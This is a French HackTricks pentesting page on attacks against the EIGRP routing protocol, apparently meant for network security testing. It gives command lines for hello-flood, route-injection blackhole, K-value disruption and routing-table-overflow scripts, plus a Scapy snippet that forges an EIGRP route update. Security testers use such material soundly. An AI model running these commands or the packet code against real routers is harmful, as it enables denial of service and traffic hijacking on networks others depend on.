Attaques EIGRP
Tip
Apprenez et pratiquez le hacking AWS :
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP :HackTricks Training GCP Red Team Expert (GRTE)
Apprenez et pratiquez le hacking Azure :
HackTricks Training Azure Red Team Expert (AzRTE)
Soutenir HackTricks
- Vérifiez les plans d’abonnement !
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépôts github.
Ceci est un résumé des attaques exposées dans https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9. Consultez-le pour plus d’informations.
Attaque des faux voisins EIGRP
- Objectif: Surcharger les CPU des routeurs en les inondant de paquets HELLO EIGRP, pouvant conduire à une attaque de type Denial of Service (DoS).
- Outil: helloflooding.py script.
- Exécution:
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
- Paramètres:
--interface: Spécifie l’interface réseau, p.ex.eth0.--as: Définit le numéro d’autonomous system EIGRP, p.ex.1.--subnet: Indique le sous-réseau cible, p.ex.10.10.100.0/24.
EIGRP Blackhole Attack
- Objectif: Perturber le flux de trafic en injectant une fausse route, conduisant à un blackhole où le trafic est dirigé vers une destination inexistante.
- Outil: routeinject.py script.
- Exécution:
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
- Paramètres:
--interface: Spécifie l’interface du système de l’attaquant.--as: Définit le numéro AS EIGRP.--src: Définit l’adresse IP de l’attaquant.--dst: Définit l’IP du sous-réseau cible.--prefix: Définit le masque de l’IP du sous-réseau cible.
Abusing K-Values Attack
- Objectif: Créer des perturbations continues et des reconnexions dans le domaine EIGRP en injectant des K-values altérées, provoquant effectivement une attaque DoS.
- Outil: relationshipnightmare.py script.
- Exécution:
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
- Paramètres:
--interface: Spécifie l’interface réseau.--as: Définit le numéro AS EIGRP.--src: Définit l’adresse IP d’un routeur légitime.
Attaque de débordement de la table de routage
- Objectif: Solliciter le CPU et la RAM du routeur en inondant la table de routage avec de nombreuses fausses routes.
- Outil: routingtableoverflow.py script.
- Exécution:
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
- Paramètres:
--interface: Spécifie l’interface réseau.--as: Définit le numéro AS EIGRP.--src: Définit l’adresse IP de l’attaquant.
Remarques sur le protocole utiles pour les attaques
- Les paquets HELLO transportent les K-values et les voisins ne se forment que lorsque celles-ci correspondent. C’est la base des attaques de mismatch/perturbation de relation liées aux K-values et explique pourquoi des K-values non appariées empêchent l’adjacence.
- Le PARAMETER TLV (Type 0x0001) dans HELLO (et l’UPDATE initial) transporte les K-values et le Hold Time, donc des captures passives révèlent les valeurs exactes utilisées sur le segment.
Scapy Packet Crafting (Route Injection / Fake Neighbors)
Scapy inclut une couche contrib EIGRP avec des TLV comme EIGRPParam et EIGRPIntRoute, ce qui suffit pour construire des UPDATEs pour l’injection de routes. Exemple adapté du script davidbombal/scapy pour l’injection de routes EIGRP:
from scapy.all import *
load_contrib("eigrp")
sendp(Ether()/IP(src="192.168.1.248", dst="224.0.0.10") /
EIGRP(opcode="Update", asn=100, seq=0, ack=0,
tlvlist=[EIGRPIntRoute(dst="192.168.100.0",
nexthop="192.168.1.248")]))
Le même repo inclut des scripts rapides “fake neighbor” qui sniffent un paquet EIGRP réel et le replayent avec une IP source spoofée pour créer des phantom neighbors (utile pour la charge CPU/pression sur la table de voisins).
- Scapy EIGRP contrib docs: https://scapy.readthedocs.io/en/latest/api/scapy.contrib.eigrp.html
- Example scripts: https://github.com/davidbombal/scapy
Routopsy & NSE — Outils
- Routopsy crée un laboratoire d’attaque de routeur virtuel (FRRouting + Scapy) et inclut des attaques DRP que vous pouvez adapter pour des tests EIGRP. https://sensepost.com/blog/2020/routopsy-hacking-routing-with-routers/
- Le NSE de Nmap contient une petite bibliothèque
eigrppour parser/générer un sous-ensemble de paquets EIGRP. https://nmap.org/nsedoc/lib/eigrp.html
Reconnaissance d’authentification
- Le mode nommé EIGRP prend en charge HMAC-SHA-256 authentication via
authentication mode hmac-sha-256 .... Si activé, les paquets forgés doivent être authentifiés avec la clé correcte ; si non activé, le spoofing/l’injection est plus facile à réaliser.
Références
- https://www.rfc-editor.org/rfc/rfc7868.html
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/iproute_eigrp/configuration/15-mt/ire-15-mt-book/ire-sha-256.html
Tip
Apprenez et pratiquez le hacking AWS :
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP :HackTricks Training GCP Red Team Expert (GRTE)
Apprenez et pratiquez le hacking Azure :
HackTricks Training Azure Red Team Expert (AzRTE)
Soutenir HackTricks
- Vérifiez les plans d’abonnement !
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépôts github.


